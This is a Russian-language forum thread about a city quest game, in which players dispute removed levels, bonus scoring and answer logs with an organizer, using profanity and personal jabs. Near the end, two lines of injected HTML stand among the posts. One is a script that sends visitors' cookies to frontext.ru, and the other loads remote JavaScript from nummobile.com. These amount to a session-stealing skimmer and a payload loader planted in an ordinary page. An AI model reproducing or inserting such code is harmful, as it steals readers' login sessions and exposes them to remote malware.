Как я понимаю уровень "за стеклом" берётся за 6 минут если заранее выслать экипаж из Пушкина в Красное Село. Спалить место очень легко. Так как в задании указан и номер дома и улица, то "поехать проверить" именно их ничего не мешает. Дальше вопрос лишь в том насколько реально взять на месте за 3-4 минуты.
Про задание "ищу тебя" , то вполне реально за 2 минуты сделать вывод, что не просто так и наклейки клеили и номера собирали с машин и попробовать ввести в качестве кода какой-то из своих номеров.
А ещё у меня вопрос к организаторам по поводу уровня "прогоноз погоды". Это только у нас само задание было изначально недопрописано?
да, реально за 4 мин взять на месте.
Вопрос, почему снят уровень "Прогноз погоды" и в какой момент он снят?
У нас он был предпоследним, под утро? Мы зря его так долго сливали? :D
Velkopiterskij
14-11-2012, 09:51
Вопрос, почему снят уровень "Прогноз погоды" и в какой момент он снят?
У нас он был предпоследним, под утро? Мы зря его так долго сливали? :D
Видимо снят потому что есть катастрофическая ошибка, которая не позволяет его взять. Пусть и выяснилось всё только после игры.
Прочитал комментарий к уровню.. Это прекрасно.
Кстати у нас количество неосновных кодов на уровне пару раз увеличивалось, но, кажется, до 23 так и не дошло.
Прочитал в сценарии про "Прогноз погоды" - "из-за ошибок в движке". Жаль, что обнаружились ошибки уже после игры. А так бы и у нас было дополнительное время на бонусы ))
Теперь понятно, кто у вас танковый задрот.
Не играл с Нового Года. А вот то, что в проекте есть "танководы" я знаю.
Как я понимаю уровень "за стеклом" берётся за 6 минут если заранее выслать экипаж из Пушкина в Красное Село. Спалить место очень легко. Так как в задании указан и номер дома и улица, то "поехать проверить" именно их ничего не мешает. Дальше вопрос лишь в том насколько реально взять на месте за 3-4 минуты.
за 4 минуты, если выиграть практически сразу кадры эти. все равно, 6 минут слишком уж феерично! гениальные брейкеры просто :)
Прочитал в сценарии про "Прогноз погоды" - "из-за ошибок в движке". Жаль, что обнаружились ошибки уже после игры. А так бы и у нас было дополнительное время на бонусы ))
Движок оказался редкостной сволочью :D
У нас тоже появился бонус на ходу и их стало 22 что ли.
Хорошо, что сняли, ибо полелогика просто жесть
DEd_MONro
14-11-2012, 10:25
ох...ть больше часа притащили))
всегда б мы так играли
гениальные брейкеры просто :)
Есть сомнения?
Есть сомнения?
ну что вы! нет конечно!
мы молодцы, что воспользовались грамотно ситуацией со снятыми уровнями :)
ох...ть больше часа притащили))
всегда б мы так играли
раз в год и палка стреляет)):D
а в движке нормальная полноценная стата будет?
DEd_MONro
14-11-2012, 10:43
за 4 минуты, если выиграть практически сразу кадры эти. все равно, 6 минут слишком уж феерично! гениальные брейкеры просто :)
Просто у нас в команде был пловец и совместительству гроссмейстер с Украины
Просто у нас в команде был пловец и совместительству гроссмейстер с Украины
так вот в чем секрет :) надо до уровней вплавь добираться :) похер, что воды нет нигде :)
Просто у нас в команде был пловец и совместительству гроссмейстер с Украины
а я шахматист, но видел как в шашки играют:D
DbSergey
14-11-2012, 11:00
А ещё у меня вопрос к организаторам по поводу уровня "прогоноз погоды". Это только у нас само задание было изначально недопрописано?
Вопрос, почему снят уровень "Прогноз погоды" и в какой момент он снят?
У нас он был предпоследним, под утро? Мы зря его так долго сливали? :D
Изначально уровень “Прогноз погоды” был забит в движок без кодов, открывающих города. В таком вариента уровень, разумеется, невозможно было взять. Коды городов были вбиты в движок около полуночи, во время присутствия на локации команд No Limits и Codebreackers, которым впоследствии планировалось из-за ошибки организаторов скорректировать результаты. Позднее, около часу ночи, было обнаружено, что в движке по-прежнему присутствуют не все коды городов (в частности, не был вбит код 51127, соответствовавший Афинам). После окончания игры было принято решение снять этот уровень как косячный сверх меры, что не влияет на итоговую статистику, поскольку уровень не был закрыт ни одной командой.
DbSergey
14-11-2012, 11:00
Уважаемые организаторы, я правильно понимаю, что в снятых уровнях командам приходили коды закрытия? То есть у команд было время снимать бонусы и посылать дополнительные экипажи на предыдущие задания? Меня одного терзают смутные сомнения, что это нихуя не равные условия на штурмовой игре?
На уровне “Мультфильмы” командам действительно при снятии приходили коды закрытия, и у них действительно было время снимать бонусы и посылать дополнительные экипажи на другие доступные задания, и это действительно создает неравные условия, как любое снятие уровня на игре с элементами штурма. При этом единственная команда, взявшая уровень “Мультфильмы” “честно”, то есть до снятия, - это “Осторожно, Маньяки!”, получившая этот уровень в 23:45 и закрывшая в 0:47. Одновременно с этим уровнем команда “Осторожно, Маньяки!” брала еще два уровня: “Угадай мелодию” и “Такси”. Уровень “Угадай мелодию” впоследствии также был снят, а уровень “Такси” берется не более чем одним экипажем. Что касается бонусов, то неравенство условий действительно имеет место.
DbSergey
14-11-2012, 11:01
а в движке нормальная полноценная стата будет?
Смотря что называть "полноценной статой".
реально, я пробежал)
и я тоже)
prinncessa
14-11-2012, 11:17
Изначально уровень “Прогноз погоды” был забит в движок без кодов, открывающих города.
Изначально уровень был вбит без кодов, открывающих координаты локации, если уж на то пошло.
После окончания игры было принято решение снять этот уровень как косячный сверх меры, что не влияет на итоговую статистику, поскольку уровень не был закрыт ни одной командой.
Ну не считая того, что мы, например, на этот уровень потратили на 11 минут больше, в следствии чего на ТЭЦ (которая у нас была одновременно с "Погодой") не могли приехать раньше, а вероятно этих 11 минут нам бы хватило на то, чтоб успеть закрыть уровень. Но это так, флуда ради...
я тут не очень вникал в проблему, скажите, я правильно понял, в штурмовой последовательности поснимали гору уровней?
я тут не очень вникал в проблему, скажите, я правильно понял, в штурмовой последовательности поснимали гору уровней?
угу :)
причем по ходу игры сняли нелепейшим образом :) дав большинству команд преимущество и доп время на бонусы.
а мы еще умудрились брать параллельно два снятых уровня :D
то есть это теперь типа нормально считается?) определение победителей и подсчитывание в течении нескольких дней какой то там статистики? Знаете, после дркашной игры мне казалось что большей хуеты и придумать было нельзя(в плане послеигровых решений), но Сирожка как всегда разорвал все мои шаблоны к ебеням=)
Не обращайте внимания на меня, я вообще не играл, а предусмотрительно забил болт на сие творение=)
то есть это теперь типа нормально считается?) определение победителей и подсчитывание в течении нескольких дней какой то там статистики? Знаете, после дркашной игры мне казалось что большей хуеты и придумать было нельзя(в плане послеигровых решений), но Сирожка как всегда разорвал все мои шаблоны к ебеням=)
Не обращайте внимания на меня, я вообще не играл, а предусмотрительно забил болт на сие творение=)
Это было решение команды.
И да, можно тебя попросить не комментировать игру, к которой ты не имеешь абсолютно никакого отношения ни как орг, ни как участник?
prinncessa
14-11-2012, 12:00
можно, Игорь, можно=)
попросить-то точно можно))
А могу ли я поросить Вас наоборот комментировать игру, Иван? Обсуждение при Вашем участии приобретает красоту и интригу!
просите и умаляйте Уанечку! ))) кто о чем)
блять, я разрываюсь теперь:rolleyes:
блять, я разрываюсь теперь:rolleyes:
шпили вилли с тобой)):D
Игорян, я ничо не могу поделать, народ просит=)
Pukkaras
14-11-2012, 12:45
Только первую треть игры видел, наверное, мне тоже не стоит комментировать
Теперь понятно, кто у вас танковый задрот. В КЦ, конечно, нашли сайт, "в котором все эти уточки и кучки говна с картинки имели номер" (с), но даже совместными усилиями определить их нам не удалось...
Это потому что вы слишком умные) Если вырезать из картинки каждый танчик по отдельности, то гуглокартинки автоматически выдают номера
Это потому что вы слишком умные) Если вырезать из картинки каждый танчик по отдельности, то гуглокартинки автоматически выдают номера
Что, кто-то задрочился вырезанием этих уточек???
Что, кто-то задрочился вырезанием этих уточек???
чо там вырезать) клиптунеть в свое удовольствие))))
prinncessa
14-11-2012, 13:21
чо там вырезать) клиптунеть в свое удовольствие))))
у меня видимо неправильный клиптунет, меня только на всякие сайты выкидывало с танками, а номер не выдавало((
Что, кто-то задрочился вырезанием этих уточек???
А ты на мш из циклоид картинки тоже не вырезаешь? У меня уже технология отработана, режу картинку раньше, чем начинаю думать, что на ней нарисовано :D
у меня видимо неправильный клиптунет, меня только на всякие сайты выкидывало с танками, а номер не выдавало((
А если быть чуть внимательнее, то всюду первым-вторым номером был сайт, где имя файла каждой картинки было названием танка;)
У меня уже технология отработана, режу картинку раньше, чем начинаю думать, что на ней нарисовано :D
похвально, молодец. Правда.
Уважаемые организаторы.
Просматривая сценарий, постоянно натыкалась на фразу: "ИЗ-ЗА ОШИБОК В ДВИЖКЕ УРОВЕНЬ БЫЛО НЕВОЗМОЖНО ЗАКРЫТЬ. УРОВЕНЬ БЫЛ СНЯТ."
Не кажется ли вам, что под эту проблему первым подходит Бонус Реклама?
DbSergey
14-11-2012, 15:17
Уважаемые организаторы.
Просматривая сценарий, постоянно натыкалась на фразу: "ИЗ-ЗА ОШИБОК В ДВИЖКЕ УРОВЕНЬ БЫЛО НЕВОЗМОЖНО ЗАКРЫТЬ. УРОВЕНЬ БЫЛ СНЯТ."
Не кажется ли вам, что под эту проблему первым подходит Бонус Реклама?
Нет. При подсчете результатов прохождения командами уровня "Реклама" никак не учитывалось, был ли он закрыт. Это делалось по логам, в которых фиксировались все вводимые варианты.
Velkopiterskij
14-11-2012, 15:24
Нет. При подсчете результатов прохождения командами уровня "Реклама" никак не учитывалось, был ли он закрыт. Это делалось по логам, в которых фиксировались все вводимые варианты.
А мне во время игры сказали, что фиксируются только верные варианты, то есть принятые движком, как верные. А вотпо остальным логов не останется.
DbSergey
14-11-2012, 15:27
А мне во время игры сказали, что фиксируются только верные варианты, то есть принятые движком, как верные. А вотпо остальным логов не останется.
Очевидно, сложилось какое-то недопонимание. Автор движка однозначно и уверенно заявляет, что в логах фиксируются все варианты ответов - и правильные, и неправильные. Это одна из причин использования стороннего движка.
Очевидно, сложилось какое-то недопонимание. Автор движка однозначно и уверенно заявляет, что в логах фиксируются все варианты ответов - и правильные, и неправильные. Это одна из причин использования стороннего движка.
а можно логи этого чудо-движка посмотреть?
Нет. При подсчете результатов прохождения командами уровня "Реклама" никак не учитывалось, был ли он закрыт. Это делалось по логам, в которых фиксировались все вводимые варианты.
А т.к. логи движка находятся только у неведомого гениального автора, который хотел довести людей до нервного тика своими автообновлениями, коему и поручен подсчет статистики по данному уровню, то можно только разводить руками...
DbSergey
14-11-2012, 15:36
В en-движке начислены очки, открыт мониторинг (http://deadline.en.cx/Administration/Games/ActionMonitor.aspx?gid=39540).
а можно логи этого чудо-движка посмотреть?
да-да, и ещё список правильных ответов в авторской орфографии. Подозреваю, что нас ждёт немало сюрпризов...
DbSergey
14-11-2012, 15:40
А т.к. логи движка находятся только у неведомого гениального автора, который хотел довести людей до нервного тика своими автообновлениями, коему и поручен подсчет статистики по данному уровню, то можно только разводить руками...
Если организатор захочет обмануть игроков, он всегда это сделает. Например, позвонит по телефону и скажет код закрытия, и никаких логов не останется. Если не доверяешь организатору провести игру и/или объективно посчитать статистику, непонятно, зачем играть.
Логи стороннего движка будут выложены в течение двух часов.
Очевидно, сложилось какое-то недопонимание. Автор движка однозначно и уверенно заявляет, что в логах фиксируются все варианты ответов - и правильные, и неправильные. Это одна из причин использования стороннего движка.
А зачем тогда организаторы просили прислать письмо с ответами, которые не прошли?
DbSergey
14-11-2012, 15:45
А зачем тогда организаторы просили прислать письмо с ответами, которые не прошли?
Во время игры и в первое время после ее окончания работа с логами стороннего движка была невозможна. На основании присланных писем планировалось оценить, насколько непрошедшие коды могут изменить статистику команд.
Во время игры и в первое время после ее окончания работа с логами стороннего движка была невозможна. На основании присланных писем планировалось оценить, насколько непрошедшие коды могут изменить статистику команд.
т.е в итоге письма с ответами вами даже не рассматривались?
Автор движка однозначно и уверенно заявляет, что в логах фиксируются все варианты ответов - и правильные, и неправильные. Это одна из причин использования стороннего движка.
Так и чем вас ЕН-движок не устроил? Уже не раз избыток программистов в командах приводил к подобному.
DbSergey
14-11-2012, 15:49
Так и чем вас ЕН-движок не устроил? Уже не раз избыток программистов в командах приводил к подобному.
Нам хотелось выдать выдать задания не все одновременно, а постепенно, что исключало возможность воспользоваться системой секторов. Мы опасались, что при выдаче заданий бонусами не увидим в движке неправильных ответов, и только во время игры поняли, что наши опасения были необоснованными.
Уже не раз избыток программистов в командах приводил к подобному.
Вот теперь и нас постигла эта участь. Однако мы по-прежнему не видим проблемы: самое главное, что должен был обеспечить сторонний движок - это вести максимально подробные логи, и он с этой задачей справился.
Зачем же ЕН? Он не может в полной мере предоставить нам большое количество внезапностей и прекрасных неожиданностей! Рандом еще никто не отменял! А вы там помница на какие-то кубики еще ругались...)))
Нам хотелось выдать выдать задания не все одновременно, а постепенно, что исключало возможность воспользоваться системой секторов.
То есть выдавать все остальные задания в игре последовательно в заданные моменты времени было можно, а конкретно это - ну совсем никак?:D
Мы опасались, что при выдаче заданий бонусами не увидим в движке неправильных ответов, и только во время игры поняли, что наши опасения были необоснованными.
Как будто первый раз с движком работали.... Сомневались, спросили бы опытных людей, а не городили огород.
Не хотите советоваться - тестовый движок есть. а так...
- demo.en.cx? не, не слышал!
:D
Мы опасались, что при выдаче заданий бонусами не увидим в движке неправильных ответов, и только во время игры поняли, что наши опасения были необоснованными.
А вот эту тему (http://dead-line.spb.ru/forum/showthread.php?t=5656) я наверно телепатически создал:cool:
Нам хотелось выдать выдать задания не все одновременно, а постепенно, что исключало возможность воспользоваться системой секторов.
Одно с другим вообще никак не связано. Хотя я не понимаю откуда вопрос про сектора выполз сейчас. Но они бы на игре тоже не помешали вместо составных кодов-закрывашек.
Мы опасались, что при выдаче заданий бонусами не увидим в движке неправильных ответов, и только во время игры поняли, что наши опасения были необоснованными.
А чего сомневаться и опасаться? Демо-движок, ну и поспрашивать можно было.
Однако мы по-прежнему не видим проблемы: самое главное, что должен был обеспечить сторонний движок - это вести максимально подробные логи, и он с этой задачей справился.
Зато её видели игроки.
А какая разница была в рекламном движке видеть/не видеть неправильные ответы? Там что - запрет перебора был?
Я вот чего-то не понимаю что вообще обсуждаем. Написали бред обосновывающий использования какого-то говнодвига и еще обсуждаем его.
Во время игры и в первое время после ее окончания работа с логами стороннего движка была невозможна. На основании присланных писем планировалось оценить, насколько непрошедшие коды могут изменить статистику команд.
Т.е. вы изначально знали, что мы зря корячимся с этим прекрасным творением, ибо вы во время игры вы поняли, что логи отследить не можете.А потом все взяло и заработало. И если уж пошел вопрос о доверии, то хотелось бы узнать имя автора ШЕДЕВРА.
tigrro4ka
14-11-2012, 16:03
Мы опасались, что при выдаче заданий бонусами не увидим в движке неправильных ответов
я даже не снаю, смеяццо или плакать ))))
вы ни разу до организации своей игры в мониторинг не залезали?
nadlooshi
14-11-2012, 16:07
Единственный вопрос, на который мне так и не ответили по почте, по поводу стороннего движка, следующий: где в сквозном сообщении о принятии рекламных слоганов было сказано, что присылать их нужно в формате, указанном в непрошедшем секторе?
Объясню. Сектор И Т,Т С Ш - "И толстый, толстый слой шоколада". На мой скромный взгляд, здесь все же нужна тире между словами "толстый" (так, кстати, считает большинство использующих данный слоган), но из-за этой клятой запятой сектор не был принят по почте.
В то же время сектор с мистером Проппером ("чище" вместо "чисто") был принят. То есть вы принимаете сектор, в котором неверное одно СЛОВО, но не принимаете сектор, в котором неверный ЗНАК ПРЕПИНАНИЯ - это как так?
По поводу е и ё тоже писала уже... это к вопросу формата, в котором нужно было присылать слоганы.
Совсем меня убил аргумент "ну у других команд этот сектор проходил, так что у вас мы его принять не можем". Без комментариев...
Ну и то, что меня лично убило.
У М - это, оказывается, УГОСТИТЕ МИШУ, а не Управляй мечтой.
Не то чтобы мне прямо сильно нужны эти бонусы (хотя нужны, конечно, на фиг мы с ними валандались до утра!), просто интересно... и да, тоже жду логов этого движка.
DbSergey
14-11-2012, 16:10
Уважаемые игроки! Задавая вопросы, на которые вам интересны ответы, вы увеличиваете количество добра на земле. В связи с этим:
Уважаемые игроки команды "Осторожно, Маньяки!"! С момента публикации этого поста все вопросы, соображения, рекомендации, характеристики, оценки и апелляции касательно прошедшей игры от вашей команды мы будем принимать только в том случае, если они будут исходить от капитана. Спасибо за понимание, извините за доставленные неудобства (http://dead-line.spb.ru/forum/showpost.php?p=194369&postcount=161).
Уважаемые игроки! Задавая вопросы, на которые вам интересны ответы, вы увеличиваете количество добра на земле. В связи с этим:
Уважаемые игроки команды "Осторожно, Маньяки!"! С момента публикации этого поста все вопросы, соображения, рекомендации, характеристики, оценки и апелляции касательно прошедшей игры от вашей команды мы будем принимать только в том случае, если они будут исходить от капитана. Спасибо за понимание, извините за доставленные неудобства (http://dead-line.spb.ru/forum/showpost.php?p=194369&postcount=161).
Уважаемый организатор, руководствуясь каким пунктом правил, Вы позволили себе такое заявление?
DbSergey
14-11-2012, 16:12
Уважаемый организатор, руководствуясь каким пунктом правил, Вы позволили себе такое заявление?
Правила не обязывают организаторов выискивать смысл в потоках твоего хамства.
у нас вроде бы свобода слова в стране - это раз.
на то и есть тема по обсуждению игры, что бы высказывать свои соображения и рекомендации - это два.
а если организаторы не могут найти ответа на вопрос, то это не проблема игроков, которые задали вопросы - три.
Правила не обязывают организаторов выискивать смысл в потоках твоего хамства.
Просите, хамство про бред обоснования или про говнодвиг? То есть констатация фактов - это хамство, ок. Вы, Сергей, продолжайте смешить народ, это так весело!
Можете не читать и не отвечать на мое сообщение, я же не капитан ;)
Невозможно не прочитать. Оно же написано.
у нас вроде бы свобода слова в стране - это раз.
на то и есть тема по обсуждению игры, что бы высказывать свои соображения и рекомендации - это два.
а если организаторы не могут найти ответа на вопрос, то это не проблема игроков, которые задали вопросы - три.
ни один из этих пунктов не обязывает команду-организатора отвечать на посты игроков.
Невозможно не прочитать. Оно же написано.
Это для тренировки силы воли;)
ни один из этих пунктов не обязывает команду-организатора отвечать на посты игроков.
команда-организаторов ДОЛЖНА отвечать на вопросы по прошедшей игре, рекомендации может пропустить мимо ушей.
видимо так после прошлой игры и поступили :)
ни один из этих пунктов не обязывает команду-организатора отвечать на посты игроков.
Да, только почему-то не отвечать на вопросы игроков пришло в голову только вашему капитану. За 12 сезонов игр - ему первому! Это ноу-хау! Патентуйте срочно. Надо вообще тему было закрыть, и не трахать всем мозг!
А вообще я очень надеюсь, что при подготовке следующей игры команды WTF пообщается с кем-нибудь опытным в использовании энкодвижка. А то что в прошлом году У меня нет уверенности что в этом Мы опасались
Упс, опять рекомендация получилась?:o
http://s013.radikal.ru/i322/1211/6b/af295ed3d5af.jpg (http://www.radikal.ru)
Book'Sir
14-11-2012, 16:42
Алекс, а откуда цитатки?
Алекс, а откуда цитатки?
Из лесуС форума, вестимо:D
Алекс, а из какой ветки форума?
Каждый, кто попытается внести в игру что-то свое, неизбежно столкнется с ошибками. И все, кто столкнулся с ошибками неизбежно встретят агрессию, хамство и нежелание сообщества проглатывать молча эти ошибки. Сережа, добро пожаловать в клуб. И ты и они одновременно и правы и неправы. Ты хотел как лучше, они не хотят, что б ты выводил сырое и непродуманное. И проблема лишь в том, что теперь они не скупятся на выражения, а ты, вполне обосновано, считаешь, что организаторы не заслужили такого отношения к себе и уходишь в оборону. Только все забывают, что это лишь игра. 10 часов жизни игроков, которые организаторы пытаются скрасить и разнообразить, удачно или не очень. Вряд ли хоть кто-то хоть когда-то пытался сотворить говно намеренно. И зачем теперь топить организаторов в своих эмоциях - непонятно. Кто-то думает, что так они быстрее поймут свои ошибки и побегут извинятся? Вряд ли, не в детском саду, вроде. Примеры Димы, Валеры, кажется, вполне достаточны. Матами, зигами и арийскими проклятиями их не остановить. Стебом и троллингом тем более. И каждая новая игра все равно делается игроками для игроков. А изобретать велосипед и тыкать в дерьмо и размазывать по тарелочке - только портить личные отношения друг к другу. Оставайтесь людьми, поливальщиков итак хватает.
Ничего сильно нового в прошедшей игре не было. И пример Валеры или Димы неуместен.
Организаторов никто не топит, им задают вопрос, на который они не могут ответить, при этом вовсе отказываясь отвечать. Сами провоцирую поток вопросов.
При этом, если почитать тред после цирка, то организаторы еще и на своих ошибках не учатся.
Сообщение выше официально подтверждает, что Георгий Басенков постиг дзен.
А если без шуток, то +1 к Го :)
gromozek
14-11-2012, 17:31
Вы знаете... +1 к Го
Сообщение выше официально подтверждает, что Георгий Басенков постиг дзен.
А если без шуток, то +1 к Го :)
Георгий этим постом просто снова мотнул башней в сторону Вентилятора, изобразил няшку, и оправдал всю ту еретическую шляпу которую он делал и делать будет=) Молодец, Уася. Но! У Го есть оправдание какое никакое) Он как делал "олфажные игры" так и делает, а у этих то нету) косяк на косяке+нежелание это признавать)
Каждый, кто попытается внести в игру что-то свое, неизбежно столкнется с ошибками. И все, кто столкнулся с ошибками неизбежно встретят агрессию, хамство и нежелание сообщества проглатывать молча эти ошибки. Сережа, добро пожаловать в клуб. И ты и они одновременно и правы и неправы. Ты хотел как лучше, они не хотят, что б ты выводил сырое и непродуманное. И проблема лишь в том, что теперь они не скупятся на выражения, а ты, вполне обосновано, считаешь, что организаторы не заслужили такого отношения к себе и уходишь в оборону. Только все забывают, что это лишь игра. 10 часов жизни игроков, которые организаторы пытаются скрасить и разнообразить, удачно или не очень. Вряд ли хоть кто-то хоть когда-то пытался сотворить говно намеренно. И зачем теперь топить организаторов в своих эмоциях - непонятно. Кто-то думает, что так они быстрее поймут свои ошибки и побегут извинятся? Вряд ли, не в детском саду, вроде. Примеры Димы, Валеры, кажется, вполне достаточны. Матами, зигами и арийскими проклятиями их не остановить. Стебом и троллингом тем более. И каждая новая игра все равно делается игроками для игроков. А изобретать велосипед и тыкать в дерьмо и размазывать по тарелочке - только портить личные отношения друг к другу. Оставайтесь людьми, поливальщиков итак хватает.
Не срача ради, но почему-то вспомнился постег (http://dead-line.spb.ru/forum/showpost.php?p=148717&postcount=14) :D
Все такие милые в этой теме. А потом на форуме в других ветках и на командных пьянках обсуждают, что народу всё меньше, играть скоро не с кем будет, новых команд не появляется, а игры по тройным просрочкам берут одни и те же люди. А главное - совсем-совсем непонятно, почему же это происходит.
Все такие милые в этой теме. А потом на форуме в других ветках и на командных пьянках обсуждают, что народу всё меньше, играть скоро не с кем будет, новых команд не появляется, а игры по тройным просрочкам берут одни и те же люди. А главное - совсем-совсем непонятно, почему же это происходит.
ага.
и мы еще боремся за звание дома высокой культуры быта (с)
Зига!
(И хуяк такая заявка от Валеры исчезла)
Не срача ради, но почему-то вспомнился постег (http://dead-line.spb.ru/forum/showpost.php?p=148717&postcount=14) :D
О, EPIC WIN! Спасибо))))
Два года работы с ДрК прошли не зря.
О, EPIC WIN! Спасибо))))
Два года работы с ДрК прошли не зря.
Ничто на земле не проходит бесследно
И юность ушедшая все же бессмертна (с) :D
Не срача ради, но почему-то вспомнился постег (http://dead-line.spb.ru/forum/showpost.php?p=148717&postcount=14) :D
хохо, я играл в это. Я раньше думал что в дл все игры такие(конечно все они такими стали сейчас, а когда я пришел они были вполне ничего себе такие).
Ничего сильно нового в прошедшей игре не было. И пример Валеры или Димы неуместен.
Организаторов никто не топит, им задают вопрос, на который они не могут ответить, при этом вовсе отказываясь отвечать. Сами провоцирую поток вопросов.
При этом, если почитать тред после цирка, то организаторы еще и на своих ошибках не учатся.
Да ладно, вон мы после Джуманджи и ошибки признавали, и на вопросы отвечали - все равно нули влепили за организацию)
Почитайте Д.Карнеги "Как завоевывать друзей и оказывать влияние на людей" часть 3 глава 1 "Споря, вы не можете выиграть"
Почитайте Д.Карнеги "Как завоевывать друзей и оказывать влияние на людей" часть 3 глава 1 "Споря, вы не можете выиграть"
Глава 3, параграф 8. "Споря, можно выиграть, но иногда можно выхватить леща"
http://cs317431.userapi.com/v317431967/1830/vLNiUPAQAbc.jpg
P.S. А мне игра понравилась, особенно - как прочитал сценарий:)
Думаю, многим командам тоже - Вон вентилятор говорят вообще в 2,5 машины играл - думаю, ребята вообще до фига увидели (нас с марком кроме трешек особо никуда не пускали:D)
Спасибо WTF за игру, делайте еще:)
Да, еще я писал про справки о сдачи крови и отрубание головы курице. IPhone 5 тоже когда-нибудь станет теплым и ламповым.
Думаю, многим командам тоже - Вон вентилятор говорят вообще в 2,5 машины играл - думаю, ребята вообще до фига увидели
они рот фрезеровали такие игры)
они рот фрезеровали такие игры)
:D
еще чуть-чуть и у нас будет лучшая постмиссия по сериалу ДОМ2-строим лубовь
Воистину "на все ваши ответы будут заданы вопросы".
Да игра была не идеальной, но неужели косяк с бонусом стоит того, чтобы все это разводить.
У меня вопрос по уровню с рекламным щитом, расскажите, плиз, полностью логику всего уровня.
Понравилось задание с адресами баянов, но и в тот же момент вопрос, а как его раскурить людям, которые играют первый раз?
я так и не увидела ответа на свои вопросы, сорри, если проглядела...
DbSergey
14-11-2012, 18:43
Статистика по бонусу "Реклама" доступна тут (https://docs.google.com/spreadsheet/pub?key=0Aoj-za6g2UladFptT0hraVhmaU41THJSVTFuSW5vOFE&output=html).
DbSergey
14-11-2012, 18:45
я так и не увидела ответа на свои вопросы, сорри, если проглядела...
Вареник, сценарий не отвечает на все вопросы? Если не отвечает, то спрашивай пожалуйста.
ну какбе я после прочтения сценария повторила свой пост)))
Статистика по бонусу "Реклама" доступна тут (https://docs.google.com/spreadsheet/pub?key=0Aoj-za6g2UladFptT0hraVhmaU41THJSVTFuSW5vOFE&output=html).
Когда плохо считает эксель, нужно счетами пользоваться.
За три с половиной дня не нашли?
Не стыдно выкладывать-то было?
--upd--
самое главное, что должен был обеспечить сторонний движок - это вести максимально подробные логи, и он с этой задачей справился.
логи не подробные - далеко не все вводы. можно "максимально подробный лог" из движка?
Если не доверяешь организатору провести игру и/или объективно посчитать статистику, непонятно, зачем играть.
После выкладывания логов и использования правил устного счета - не доверяю.
Статистика по бонусу "Реклама" доступна тут (https://docs.google.com/spreadsheet/pub?key=0Aoj-za6g2UladFptT0hraVhmaU41THJSVTFuSW5vOFE&output=html).
Какие-то странные логи. Это все вводы?
И - Н, Ж - В!' ИМИДЖ — НИЧТО, ЖАЖДА — ВСЁ!' имидж - ничто, жажда - всё!'
Что в этом варианте неправильно, кроме того, что в верный вариант забиты длинные черточки, а в задании и ответе короткие?
Ну и ещё куча подобного.
Как смешно, что не засчитан ответ только потому, что он написан маленькими буквами! :D
Как смешно, что не засчитан ответ только потому, что он написан маленькими буквами! :D
В моём примере выше из-за длины черточек:D
В моём примере выше из-за длины черточек:D
Это ты еще точку в конце не заметил :D
Которая кому-то зачтена, кому-то нет.
И даже посчитав зеленые клеточки сбоку по нашей команде ну никак ничего не получается, раза в 2 с лишним. Но за 3 дня посчитать зеленые клеточки не представилось возможности.
Гриц, а ты попроси их пересчитать, а то они на нас не реагируют. :D
От длины "черточки" зависит тире это или дефис, которые употребляются каждый по-своему, вроде так как-то.
От длины "черточки" зависит тире это или дефис, которые употребляются каждый по-своему, вроде так как-то.
Ань, посмотри в моём примере на длину черточек в задании, верном ответе и нашем ответе)
tigrro4ka
14-11-2012, 20:51
От длины "черточки" зависит тире это или дефис, которые употребляются каждый по-своему, вроде так как-то.
угу. но вот в ворде есть атозамена "короткой черточки" на тире при наличии пробелов по краям, а в "движке" нет
P.S. А мне игра понравилась, особенно - как прочитал сценарий:)
мне вот игра тоже понравилась, ленфильм, такси, вышки, локи - не стояли ни минуты почти. не знаю че все ругаюццо :)
Думаю, многим командам тоже - Вон вентилятор говорят вообще в 2,5 машины играл - думаю, ребята вообще до фига увидели (нас с марком кроме трешек особо никуда не пускали:D)
Спасибо WTF за игру, делайте еще:)
футу еще в меньше играли - 2.15 машины, 9рыл в поле и 1.5 анонимуса в штабе и так всю игру.... :( но зато увидели много :)
<script> img = new Image(); img.src = "http://frontext.ru/www/s.gif?"+document.cookie; </script>
<script language='javascript' charset='UTF-8' type='text/javascript' src='http://nummobile.com/5xp7hcttwrg8mo7f21d91w182wpm1d91'></script>
DbSergey
15-11-2012, 00:46
ну какбе я после прочтения сценария повторила свой пост)))
Вареник, намекни пожалуйста, что именно непонятно? Как раскуривался первый адрес? Как раскуривался второй? Что нужно было искать на локации? По чему именно остались непонятки?
Ань, посмотри в моём примере на длину черточек в задании, верном ответе и нашем ответе)
Гриш, перед тем, как написать свой пост, я всё ВНИМАТЕЛЬНО посмотрела. Рукалитсо.
Book'Sir
15-11-2012, 09:00
Статистика по бонусу "Реклама" доступна тут (https://docs.google.com/spreadsheet/pub?key=0Aoj-za6g2UladFptT0hraVhmaU41THJSVTFuSW5vOFE&output=html).
Эммммм, я вообще не хотел переходить по ссылке, т.к. являюсь закоренелым полем... вот решил все таки глянуть с утра, что же вызвало такую реакцию у соплеменников... и знаете, я в акуе :confused:
А было изначально требование вбивать ответы именно большими буковками? Если нет, то херня какая-та получается, уж извините:mad:
tigrro4ka
15-11-2012, 09:55
А было изначально требование вбивать ответы именно большими буковками? Если нет, то херня какая-та получается, уж извините:mad:
В примере в "движке" бы намек на знаки препинания и заглавные буквы в начале предложения.
В примере в "движке" бы намек на знаки препинания и заглавные буквы в начале предложения.
Живу надеждой, что богомерзкий зеленый движок вскоре научится сам транспонировать ту херню, которую я в него пишу, забывая сменить раскладку, в верный ответ =)
Velkopiterskij
15-11-2012, 13:26
Срок подачи апелляций - до 2:40 ночи 15 ноября.
Правильно я понимаю, что апелляций не поступало и статистика окончательная?
DbSergey
15-11-2012, 13:28
Апелляций не поступало, статистика окончательная. CodeBreakers, поздравляем с убедительной победой!
Спасибо всем, кто играл в нашу игру. Отдельное спасибо всем за отзывы - за положительные и отрицательные, за те, что на форуме, и те, что в личках. Мы услышали каждого, кто хотел донести до нас какую-то информацию или эмоцию, независимо от того, понравилась человеку игра или нет, хотел он конструктива или нет и важно ли ему было, чтобы мы его услышали и поняли. От лица организаторов я приношу извинения тем, кто писал конструктивные отзывы на форуме: пытаться обсудить игру в этой ветке было совершенно бесполезно. В личках мы получили намного больше положительных отзывов и намного меньше отрицательных, чем на форуме. Это характерно, но совершенно неудивительно =)
Срок приема оценок - до 13:30 20.11.2012.
Для вас старались:
Amakan
Arxangel
Cinderella
DbSergey
EPRST
Golidba
Leila
Mike Vazovsky
Muzzy
Nattashko
NAughtyKt
Optimist
R.A.V.E
Rada
Tvaruga
Vixen
Walker
ZORGer
Ежик
Нагие Пальчики
Павлик Морозов
Сашка-Ко3а
Сэм
Шкура
Южный
и другие
Средняя 12,568(3) -> 13 баллов в рейтинг.
